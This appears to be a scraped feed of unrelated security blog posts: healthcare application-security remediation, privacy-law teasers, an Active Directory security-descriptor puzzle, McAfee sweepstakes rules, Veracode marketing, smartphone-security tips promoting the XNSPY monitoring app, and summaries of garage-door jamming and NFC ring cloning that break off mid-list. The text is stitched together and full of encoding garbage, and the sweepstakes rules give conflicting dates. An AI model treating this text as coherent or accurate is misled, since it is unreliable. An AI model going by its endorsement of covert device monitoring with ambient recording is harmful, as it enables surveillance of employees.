Too often, remediation is an afterthought as developers scramble to patch holes in their systems post-breach. A recent report in the journal of Health Services Research suggests that this herculean effort can put a strain on patient health when things slow down after a breach and new security measures are introduced. However, preventative care can work in the security world just as it does for your health.

Less isn???t more in healthcare cybersecurity

Some experts and industry thought leaders see unfortunate breaches as opportunities to better understand what went wrong and how it can be prevented in the future. Unfortunately, information from these breaches sometimes muddies the tumultuous waters of cybersecurity and can cause panic over increased security procedures.

Josephine Wolff, assistant professor of cybersecurity policy at Tufts Fletcher School of Law and Diplomacy, found that the 2019 report published in the journal of Health Services Research draws dangerous conclusions about the negative impacts of mitigating cyberattacks in healthcare. The HSR paper proposes that lost passwords and associated security measures???like two-factor authentication???hold up patient care with increased wait times for ECGs and result in higher rates of fatal heart attacks. A point, they suggest, that should lead to less aggressive security efforts.

In her article, Wolff proposes that a slower remediation process is precisely why more medical institutions should view this as a crucial pivot point, not a nuisance. She explains, ???Undoubtedly, IT upgrades and updates can inconvenience workers and slow down operations in any workplace, but that is a reason to develop techniques and processes for implementing them more smoothly???not to write them off as harmful and counterproductive.??? Even the most basic preventive actions are crucial best practices, and they???re just a starting point.

The cyberattack epidemic in healthcare

Data from the last decade shows just how damaging breaches can be for institutions and patients alike. According to HIPAA Journal, there were 2,546 healthcare breaches from 2009 to 2018 that exposed over 180,000,000 patient records to attackers, resulting in costly settlements and fines for HIPAA violations. Additionally, figures from the Protenus 2019 Breach Barometer report reveal that in 2018 alone, the healthcare sector saw a whopping 15,085,302 patient records breached???a number that nearly tripled from 2017 to 2018.ツ?

These trends are alarming but important to watch. Our 10th annual State of Software Security (SOSS) report examines trends in various industries, including healthcare, and the data sheds some light on why it???s so crucial for organizations to get a jump on security measures.ツ?

Healthcare Security Rank

We found that healthcare institutions have the highest prevalence of severe flaws at 52 percent and are the slowest to fix said flaws, with a median time-to-remediation (MedianTTR) of 131 days. All this typically contributes to security debt, which accumulates over time as more and more flaws are left uncorrected.

Daunting security debt is a problem that your DevOps team can tackle with the right processes in place, including a steady cadence of scans. Our SOSS report found that those who conduct up to 12 scans per year have a MedianTTR of 68 days, while those who scan more than 260 times per year have a MedianTTR of just 19 days (that???s a substantial 72 percent reduction in remediation time).

Increasing the regularity of your scans can have a lasting impact on security debt. In fact, we found that frequent scanners carry 5x less security debt than sporadic scanners who lack a reliable testing process. The remedy is clear: scanning often and speeding up fix rates to mitigate severe flaws will cause far fewer headaches in the future and, ultimately, prevent downtrends in patient care.

A process-minded prognosis

The good news in this year???s SOSS report is that healthcare institutions have a fix rate of 72 percent, which is decent when compared to other industries. Still, hospitals and healthcare providers must stay on top of application scanning to increase frequency and efficiency, cutting down their MedianTTR.

The solution? Shifting DevSecOps behaviors from reactive to proactive through keener code management and more thorough remediation processes. This entails making sure security programs:

  • Include a trained team of security-minded developers
  • Cover all applications across your health organization
  • Include a frequent and steady scanning cadence
  • Have ample resources developers can tap into for testing and fixes
  • Are adaptable enough to handle shifting landscapes in cybersecurity
  • Are equipped to cover third-party vendors used by the organization

Taking steps towards a well-rounded security program not only bolsters your defense against attacks but also sheds light on wrinkles in your remediation process that need ironing. With these measures in place, if a breach or a cyberattack occurs, your healthcare organization will be better equipped to handle issues with minimal to no impact on patient care.

Learn more about cybersecurity in healthcare

Like what you see? Find more info about the state of cybersecurity for healthcare by downloading our SOSS Volume 10 Industry Snapshot, and then check out the full report to keep a pulse on the shifts in DevSecOps over the last ten years.ツ?

ツ?

ツ?

For privacy, 2020 is not for hindsight

It has been an exciting few years for privacy. The passing and enforcement of new laws (such as CCPA and GDPR) and modifications made to others have caused a flurry of activity across organizations of all sizes. Decisions have been made about how meeting the laws’ requirements by changing procedures and policies. Now it is […]

The post For privacy, 2020 is not for hindsight appeared first on Privacy Ref.

CCPA and University Surveillance Apps

It’s the turn of a new decade and a new privacy law has gone into effect — the California Consumer Privacy Act or CCPA. A quick check with some of my fellow privacy pros on how many consumer information requests received at the end of the day on Jan. 1, puts retail at higher numbers […]

The post CCPA and University Surveillance Apps appeared first on Privacy Ref.

Who Needs WMDs (Weapons of Mass Destruction) Today ?

Folks,

Today, yet again, I'd like to share with you a simple Trillion $ question, one that I had originally asked more that 10 years ago, and recently asked again just about two years ago. Today it continues to be exponentially more relevant to the whole world.

In fact, it is more relevant today than ever given the paramount role that cyber security plays in business and national security.


So without further adieu, here it is - Who needs WMDs (Weapons of Mass Destruction) Today?


Ans: Only those who don't know that we live in a digital world, one wherein virtually everything runs on (networked) computers.


Why would an entity bother trying to acquire or use a WMD (or for that matter even a conventional weapon) when (if you're smart) you could metaphorically stop the motor of entire organizations (or nations) with just a few lines of code designed to exploit arcane but highly potent misconfigured security settings (ACLs) in the underlying systems on which governments, militaries and thousands of business organizations of the world operate?

Today, all you need is two WDs in the same (pl)ACE and its Game Over.


Puzzled? Allow me to give you a HINT:.

Here’s a simple question: What does the following non-default string represent and why should it be a great cause of concern?
(A;;RP;;;WD)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(A;;RPLCLORC;;;AU)(A;;RPWPCRLCLOCCRCWDWOSW;;;DA)(A;CI;RPWPCRLCLOCCRCWDWOSDSW;;;BA)(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;SY)(A;CI;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;EA)(A;CI;LC;;;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (A;CI;RPWDLCLO;;;WD)(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RPLCLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(A;;RC;;;RU)(OA;CIIO;RPLCLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)

Today, this one little question and the technicality I have shared above directly impacts the cyber security of the entire world.


If you read my words very carefully, as you always should, then you'll find that it shouldn't take an astute cyber security professional more than a minute to figure it out, given that I’ve actually already provided the answer above.


Today, the CISO of every organization in the world, whether it be a government, a military or a billion dollar company (of which there are dime a dozen, and in fact thousands worldwide) or a trillion dollar company MUST know the answer to this question.


They must know the answer because it directly impacts and threatens the foundational cyber security of their organizations.

If they don't, (in my opinion) they likely shouldn't be the organization's CISO because what I have shared above could possibly be the single biggest threat to 85% of organizations worldwide, and it could be used to completely compromise them within minutes (and any organization that would like a demo in their real-world environment may feel free to request one.)

Some of you will have figured it out. For the others, I'll finally shed light on the answer soon.

Best wishes,
Sanjay


PS: If you need to know right away, perhaps you should give your Microsoft contact a call and ask them. If they too need some help (they likely will ;-)), tell them it has to do with a certain security descriptor in Active Directory. (There, now that's a HINT the size of a domain, and it could get an intruder who's been able to breach an organization's network perimeter to root in seconds.)

PS2: If this intrigues you, and you wish to learn more, you may want to read this - Hello World :-)

Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes!

We’ve officially touched down in Las Vegas for CES 2020!

If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies, including IoT devices. Though these devices are convenient, they can also be cause for possible security concerns due to overlooked weaknesses. Check out the latest research from the McAfee Advanced Threat Research (ATR) team on device vulnerabilities for more information.

With the growing consumer technology landscape, we here at McAfee understand the importance of creating new solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving three [3] lucky people the chance to win an Amazon gift card. Not heading to CES this year Not heading to CES this year? No problem! Simply retweet one of our contest tweets with the required hashtag between January 7th – 9th for your chance to win. Follow the instructions below to enter, and good luck!


#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • There will be three [3] sweepstakes tweets will be released at the following schedule including the hashtags: #RT2Win, #Sweepstakes AND #McAfeeAtCES
    • Tuesday, January 7, 2020 at 7:00AM PST
    • Wednesday, January 8, 2020 at 7:00AM PST
    • Thursday, January 9, 2020 at 7:00AM PST
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PST, from your own handle. The #RT2Win, #Sweepstakes AND #McAfeeAtCES hashtags must be included to be entered.
  • Sweepstakes will end on Thursday, January 9, 2020 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday, August 28, 2019 via Twitter direct message.
  • Limit one entry per person.
1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #McAfeeAtCES” for a chance at an Amazon Gift card. Winners must be following @McAfee_Home for eligibility. One [1] winner will be selected per day, and notified by 10:00AM PT the following day, for a total of three [3] winners. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#McAfeeAtCES RT2Win CES Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win CES Sweepstakes will be conducted from January 7th through January 9th. All entries for each day of the #McAfeeAtCES RT2Win CES Sweepstakes must be received during the time allotted for the #RT2Win CES Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win CES Sweepstakes. The #McAfeeAtCES RT2Win Sweepstakes duration is as follows:

  • Begins: Tuesday, January 7, 2020 at 7:00am PST
  • Ends: Thursday, January 9, 2020 at 11:59 PST
    • Opportunity 1: Tuesday, January 7, 2020 at 7:00AM PST
    • Opportunity 2: Wednesday, January 8, 2020 at 7:00AM PST
    • Opportunity 3: Thursday, January 9, 2020 at 7:00AM PST
  • Winners will be announced: by 10:00AM PST the following day

For the #McAfeeAtCES RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #McAfeeAtCES RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #McAfeeAtCES, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags.
    1. Note: Tweets that do not contain the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person.

Three [3] winners will be chosen for the #McAfeeAtCES RT2Win CES Sweepstakes tweet from the viable pool of entries that retweeted and included #McAfeeCES Sweepstakes. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on January 10th on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC.

3. Eligibility: 

McAfee’s #RT2Win CES Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the #McAfeeAtCES RT2Win CES Sweepstakes begins and live in a jurisdiction where this prize and #McAfeeAtCES RT2Win CES Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected from the eligible entries received during the days of the #McAfeeAtCES RT2Win CES Sweepstakes periods. Sponsor will select the names of three [3] potential winners of the prizes in a random drawing from among all eligible

Submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #McAfeeAtCES RT2Win CES Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by January 10, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner if potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prizes for the #McAfeeAtCES RT2Win CES Sweepstakes are two [2] $100 Amazon e-gift cards and a one [1] $200 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 and $200 USD; the total ARV of all gift cards is $400 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #McAfeeAtCES RT2Win CES Sweepstakes, or by any technical or human error, which may occur in the processing of the #McAfeeAtCES RT2Win CES Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #McAfeeAtCES RT2Win CES Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #McAfeeAtCES RT2Win CES Sweepstakes -related activity, or participation in the #McAfeeAtCES RT2Win CES Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

 9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize #McAfeeAtCES RT2Win CES Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each #McAfeeAtCES RT2Win CES Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Day #RT2Win CES Sweepstakes will be handled in accordance policy set forth at https://www.mcafee.com/enterprise/en-us/about/legal/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before January 10th 2021 to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes! appeared first on McAfee Blogs.

Veracode CEO Sam King Recognized in WomenInc. Magazine’s 2019 Top Influential Corporate Directors

We???re thrilled to announce that Veracode Chief Executive Officer Sam King has been named one of WomenInc. Magazine???s 2019 Most Influential Corporate Directors!

Honoring influencers, achievers, and executives, this announcement recognizes women who are making notable contributions to the world of business and technology. The list compiled by WomenInc. Magazine includes over 700 directors serving on the boards of S&P 1000/Mid-Cap publicly held companies.

To celebrate these accomplished leaders, WomenInc. maintains an exclusive online directory of honorees and publishes their yearly announcement in seasonal editions of the magazine.

King is recognized for her contributions on behalf of Progress Software, the leading provider of application development and digital experience technologies. Since joining the Board of Directors in February 2018, she has contributed to the implementation of Progress??? business strategy as well as its charter to operate as a socially responsible organization.

She is also a well-known expert in cybersecurity and is a founding member of the Veracode team. She helped lead the establishment and evolution of the application security category alongside industry experts and analysts. Veracode is the largest independent application security provider worldwide, valued at $1 billion.

???It is essential that the achievements and success of professional women are showcased in the highest regard and their stories are told in meaningful ways,??? said Catrina Young, the Executive Vice President and Chief Communications Officer ofツ?WomenInc. ???We are proud that we can recognize this distinguished group of women and we are inspired by their accomplishments, their distinguished careers and the corporations that demonstrate an inclusive board composition. We offer our congratulations.???

Encouraging positive dialogue from influential female voices in leadership, WomenInc. Magazine is a media platform dedicated to fostering the ideas, events, social commentary, and stories that inspire professional women.

To see the full list of honorees, visit the directory here or grab a copy of WomenInc.???s winter issue from your local newsstand.

Security at DevOps Speed: How Veracode Reduces False Positives

Originally Published on November 27, 2017 -- Updated on January 7, 2020

Application security solutions that slow or stall the development process simply aren???t feasible in a DevOps world. AppSec will increasingly need to fit as seamlessly as possible into developer processes, or it will be under-used or overlooked. But overlooking AppSec puts your organization at high risk of a damaging breach. Our most recentツ?State of Software Securityツ?report found that a whopping 83 percent of apps had at least one vulnerability on initial scan. Leaving your code vulnerable leaves your organization open to breach. In the end, you need AppSec, but you also need AppSec that developers will use. Reduction of false positives is a big part of this requirement. False positives are always a key concern because they makeツ?developers and securityツ?folks spin their wheels, so solutions should minimize them as much as possible.

How Veracode Works to Reduce False Positives

We aim for full automation and high speeds for all of our scans, but that doesn???t mean that we compromise on quality. Unique to our position as a SaaS provider, our security research team regularly samples customer app submissions to manually review flaws. This ensures that we have met our standards for accuracy in terms of both false positives and negatives. By reviewing actual customer apps, we get a much broader and realistic set of cases than would be possible in a QA lab that only tests applications built as internal test cases.

Our review of these applications leads to improvements that are implemented back into ourツ?static analysis engine.ツ?

The SaaS Advantage

As a native SaaS provider, Veracode has a strategic advantage in improving false-positive rates. To date, we???ve assessed over 13.5 trillion lines of code and performed more than 4 million scans, and with every release, our solution gets smarter. On-premises solutions, on the other hand, require their customers to manually create custom rules to adjust for false positives in their vendor???s software, which can be very time consuming and complicated, or to wait for their on-premises vendor to release a new revision to the scanner, which requires downtime and unplanned work for the security teams. We at Veracode improve our static analysis engine at least monthly, and improvements we have made by observing the behavior of all customer applications are available with minimal disruption to your processes.

The result for our customers is that they get very high quality at high speeds (89 percent of our scans finish in less than an hour), without having to train and maintain a team for customizing scan rules to avoid false positives. This rule customization can be costly and time consuming, and requires a skill set that is hard to come by. In addition, customizations can be challenging to maintain if the person who wrote the code leaves the company. Finally, rule customization can muddy results for attestations ??? it???s hard to prove to third parties that your apps are secure if anyone can rig the results by manipulating rules.

On the other hand, our false-positive rate is a low 1.1 percent ??? with zero rule customizing. This 1.1 percent false positive rate across real-world applications is verified and based on feedback from our customers on vulnerabilities they have reviewed. By comparison, our competitors claim a 32 percent false positive rate.

Bottom Line

The Veracode solution has scanned hundreds of thousands of enterprise, mobile and cloud-based apps, and we???ve helped our customers fix more than 48 million flaws. Bottom line? Better analytics, faster improvements, increased accuracy and the ability to create more software, more securely than ever before.

Find out more about the Veracode Application Security solution.

Cybercrime is moving towards smartphones – this is what you could do to protect your company

By 2021, cybercrimes will cost companies USD 6 trillion, according to a study.

The number of internet users has grown from an estimated at 2 billion in 2015 to 4.4 billion in 2019, but so have the cybercrimes which are expected to cost companies USD 6 trillion worldwide, according to a study by Cybersecurity Ventures.

Similarly, the number of smartphone users has grown from 2.5 billion in 2016 to 3.2 billion in 2019 and is forecasted to grow to 3.8 billion by 2021. Smartphones and the internet will make further inroads to our economic system. But there are certain risks involved as well.

Mobile phones are becoming targets of cybercriminals because of their widespread use and increasing computing power. Consider the fact that more than 60 % of online fraud occurs through mobile phones. This threat is not just towards individual users but businesses as well. It does not matter how large the company is either. 43% of the cyberattacks in 2019 were aimed at smaller businesses because they do not have adequate protection.

Given how vulnerable smartphones are and that the threat from cyber attacks is only expected to increase, here are some measures you can take to protect your business from cybercriminals:

Rethink BYOD:

Bring Your Own Devices (BYOD) offers several benefits to both the organization and employees. Such a policy allows employees at a company to use their mobile phones, tablets, or laptops for work, saving companies the hassle to purchase devices.

However, you need to rethink if you are saving more than what you are losing. Employees have confidential company information on their devices. Such a door into your organization can cost you heavily. Set aside the funds to obtain company devices for use by employees at the office. Consider such an investment as part of your cybersecurity strategy.

 

Cybersecurity assessments:

The cybersecurity threat landscape is ever-evolving due to the fast nature of innovation. Develop a comprehensive cybersecurity program that includes a regular assessment of your company’s security needs. Identify the strengths of your IT infrastructure against potential attacks, and do not let advances in technology or techniques take that away from you. Similarly, you should identify the vulnerabilities in your systems. Make sure any gaps in your defenses are appropriately plugged. A threat assessment should be an integral component of any cybersecurity policy.

Retrain staff:

Make sure that employees at your organization are informed and up to date on the latest in cyber threats. This way they can protect themselves and the company from cybercriminals. Even a single mistake by one employee can end up creating a door for individuals or groups wishing your company harm. All employees must be trained as a matter of policy. This way, they can identify phishing attacks and manage social engineering scams. Another factor your employees must be mindful of is resource monitoring. Suspicious resource use on company devices, whether it is excess internet or battery usage, should raise alarm bells. However, employees may not look into such things in detail because they do not own the devices. Train your staff to keep track of resource use too.

 

Employee monitoring:

Most organizations have some form of an employee monitoring policy and track their workers. If you haven’t done so already, develop such a policy, and keep your employees informed to ensure transparency. If you have decided to use company devices, you can opt to install monitoring apps on them. There are several modern monitoring apps currently available such as XNSPY. The app can keep track of online activities, generate a list of call logs, and remote control the device. Furthermore, you can track the location of the device in real-time, and use features such as geofencing and GPS history. There are other powerful features too, such as ambient recording, multimedia access, and online activity tracking. You can also wipe off all the data from a device in case of theft. Monitoring apps such as XNSPY should be a part of your strategy against cybercriminals.

 

Don’t forget physical infrastructure:

Cybersecurity may involve software updates and training policies, but making sure your physical infrastructure is safe is just as important. Re-evaluate how exposed your digital infrastructure is to physical access. Furthermore, go through the profiles of suppliers and vendors to vet them properly. A small door in any piece of equipment can let cybercriminals through and bypass your entire cybersecurity foundation. Be aware of this threat and make sure that suppliers work by following specific regulations.

Develop a threat monitoring policy:

Anticipating an attack and stopping it is an important part of comprehensive cybersecurity policy. Make sure that you are monitoring your digital infrastructure round the clock.

Invest in threat monitoring software and a team of professionals that can identify, track, and stop an attack.

The concept of designing a cybersecurity system as a fortification is changing to an adaptable system that can accommodate evolving security threats. Furthermore, a monitoring policy also needs to have a clear response plan.

Such a plan details what needs to happen and when in case of an attack. This ensures that there is a speedy response by your company against any threat.

 Conclusion:

Smartphones have become powerful enough that they can be considered as computers in their own right. While this has created scores of opportunities, there are also clear threats posed by cybercrime. These threats are only going to increase as the internet and smartphone use increases. While protecting your business against cyber criminals requires a considerable investment of time and money, it will pay off in the long run.

 

Clark Thomas is an expert in VOIP. He helps businesses both small and medium-sized, in implementing and adopting the best security methods for their organization and network. He gives great advice regarding and assists people in boosting the security measures for their website and business.  

The post Cybercrime is moving towards smartphones – this is what you could do to protect your company appeared first on CyberDB.

What is Active Directory? (Cyber Security 101 for the Entire World)

Folks,

Today is January 06, 2020, and as promised, here I am getting back to sharing perspectives on cyber security.


Cyber Security 101

Perhaps a good topic to kick off the year is by seeking to ask and answer a simple yet vital question - What is Active Directory?

You see, while this question may seem simple to some (and it is,) its one of the most important questions to answer adequately, because in an adequate answer to this most simple question lies the key to organizational cyber security worldwide.

The simple reason for this is that if you were to ask most CISOs or IT professionals, they'll likely tell you that Active Directory is the "phone book" of an organization's IT infrastructure, and while its true that at its simplest, it is a directory of all organizational accounts and computers, it is this shallow view that leads organizations to greatly diminish the real value of Active Directory to the point of sheer irresponsible cyber negligence because  "Who really cares about just a phone book?"

In fact, for two decades now, this has been the predominant view held by most CISOs and IT personnel worldwide, and sadly it is the negligence resulting from such a simplistic view of Active Directory that are likely the reason that the Active Directory deployments of most organizations remain substantially insecure and vastly vulnerable to compromise today.

Again, after all, who cares about a phone book?!




Active Directory - The Very Foundation of Organizational Cyber Security Worldwide

If as they say, a "A Picture is Worth a Thousand Words", perhaps I should paint you a very simple Trillion $ picture -


An organization's Active Directory deployment is its single most valuable IT and corporate asset, worthy of the highest protection at all times, because it is the very foundation of an organization's cyber security.

The entirety of an organization's very building blocks of cyber security i.e. all the organizational user accounts and passwords used to authenticate their people, all the security groups used to aggregate and authorize access to all their IT resources, all their privileged user accounts, all the accounts of all their computers, including all laptops, desktops and servers are all stored, managed and secured in (i.e. inside) the organization's foundational Active Directory, and all actions on them audited in it.

In other words, should an organization's foundational Active Directory, or a single Active Directory privileged user account, be compromised, the entirety of the organization could be exposed to the  risk of complete, swift and colossal compromise.



Active Directory Security Must Be Organizational Cyber Security Priority #1

Today, ensuring the highest protection of an organization's foundational Active Directory deployment must undoubtedly be the #1 priority of every organization that cares about cyber security, protecting shareholder value and business continuity.


Here's why - A deeper, detailed look into What is Active Directory ?


For anyone to whom this may still not be clear, I'll spell it out - just about everything in organizational Cyber Security, whether it be Identity and Access Management, Privileged Access Management, Network Security, Endpoint Security, Data Security, Intrusion Detection, Cloud Security, Zero Trust etc. ultimately relies and depends on Active Directory (and its security.)



In essence, today every organization in the world is only as secure as is its foundational Active Directory deployment, and from the CEO to the CISO to an organization's shareholders, employees and customers, everyone should know this cardinal fact.

Best wishes,
Sanjay.

What You Need to Know About the Latest IoT Device Flaws

The McAfee Advanced Threat Research (ATR) team recently uncovered a security flaw in a popular connected garage door opener and a security design issue in an NFC (meaning near field communication, which is a technology that allows devices to communicate with each other) smart ring used to unlock doors. As we head into CES 2020, the global stage where innovators showcase the next generation of consumer technologies, let’s take a look at these new security flaws and discover how users can connect securely and with confidence.

Review Chamberlain IoT device

The McAfee ATR team recently investigated the Chamberlain MyQ Hub, a “universal” garage door automation platform. The Hub acts as a new garage door opener, similar to the one that you would have in your car. However, the McAfee ATR team discovered an inherent flaw in the way the MyQ Hub communicates over radio frequency signals. It turns out that hackers can “jam” the radio frequency signals while the garage is being remotely closed. How? By jamming or blocking the code signal from ever making it to the Hub receiver, the remote sensor will never respond with the closed signal. This delivers an error message to the user, prompting them to attempt to close the door again through the app, which actually causes the garage door to open.

How can the Chamberlain IoT device be hacked?

Let’s break it down:

  • Many users enjoy using the MyQ Hub for the convenience of package delivery, ensuring that their packages are safe from porch pirates and placed directly in the garage by the carrier=.
  • However, an attacker could wait for a package delivery using the connected garage door opener. The hacker could then jam the MyQ signal once the carrier opens the door and prompt an error message for the user. If and when the user attempts to close the door, the door will open and grant the attacker access to the home.
  • An attacker could also wait and see when a homeowner physically leaves the premises to jam the MyQ signal and prompt the error message. This would potentially allow further access into the home.

Review McLear NFC Ring IoT device

The McAfee ATR team also discovered an insecure design with the McLear NFC Ring, a household access control device that can be used to interact with NFC-enabled door locks. Once the NFC Ring has been paired with an NFC-enabled door lock, the user can access their house by simply placing the NFC Ring within the NFC range of the door lock instead of using a traditional house key. However, due to an insecure design, hackers could easily clone the ring and gain access to a user’s home.

How can the McLear NFC Ring be hacked?

  • First, the attacker can do some basic research on the victim, such as finding a social media post about how excited they are to use their new McLear NFC Ring.
  • Now, say the attacker locates the victim in a public setting and asks them to take a picture of them on the attacker’s phone. The attacker’s phone, equipped with an app to read NFC tags, can record the relevant information without giving any signs of foul play.
